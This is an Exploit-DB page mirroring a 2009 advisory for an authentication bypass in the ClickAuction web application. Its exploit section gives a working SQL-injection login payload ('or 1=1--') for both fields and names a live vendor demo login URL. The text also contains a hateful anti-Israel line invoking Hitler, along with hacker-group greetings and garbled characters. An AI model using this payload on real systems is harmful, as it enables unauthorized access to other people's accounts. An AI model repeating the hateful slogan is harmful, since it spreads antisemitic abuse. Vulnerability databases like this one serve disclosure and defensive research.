ClickAuction - Authentication Bypass

EDB-ID:

7880

CVE:

2009-0297

EDB Verified:

Author:

R3d-D3V!L

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-01-26

Vulnerable App:

[â˜¢] â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢{Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…}â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢


[â˜ ]
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability

[â˜ ]

[~] Vendor: ClickAuction

[â˜ ]
[â˜ ] Software: ClickAuction

[â˜ ]
[â˜ ] author: ((Ñ3d D3v!L))


[â˜ ]
[â˜ ] Date: 26.1.2009


[â˜ ]
[â˜ ] Home: www.ahacker.biz

[â˜ ]
[â˜ ] contact: N/A



[â˜ ]â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ {DEV!L'5 of SYST3M}â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ 


[â˜ ] Exploit:



[â˜ ] username: r0' or ' 1=1--


[â˜ ] password: r0' or ' 1=1--




[â˜ ]login 4 d3m0:



[â˜ ]www.clicktech.com/clickauction/login.asp

N073:
FUCKEN !SRAEL DON'T FORGET ((â˜ HETLARâ˜ ))

GOD HELP GAZA!!

[~]-----------------------------{str0ke}---------------------------------------------------

[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & M4NON
[~]

[~] spechial thanks : dolly & 7am3m & EL z0hery & SWEET NONO & {str0ke}

[~]

[â˜ ] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller

[~]

[~] xp10.biz & ahacker.biz

[~]


[~]--------------------------------------------------------------------------------

Get news, entertainment and everything you care about at Live.com. Check it out!

# milw0rm.com [2009-01-26]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services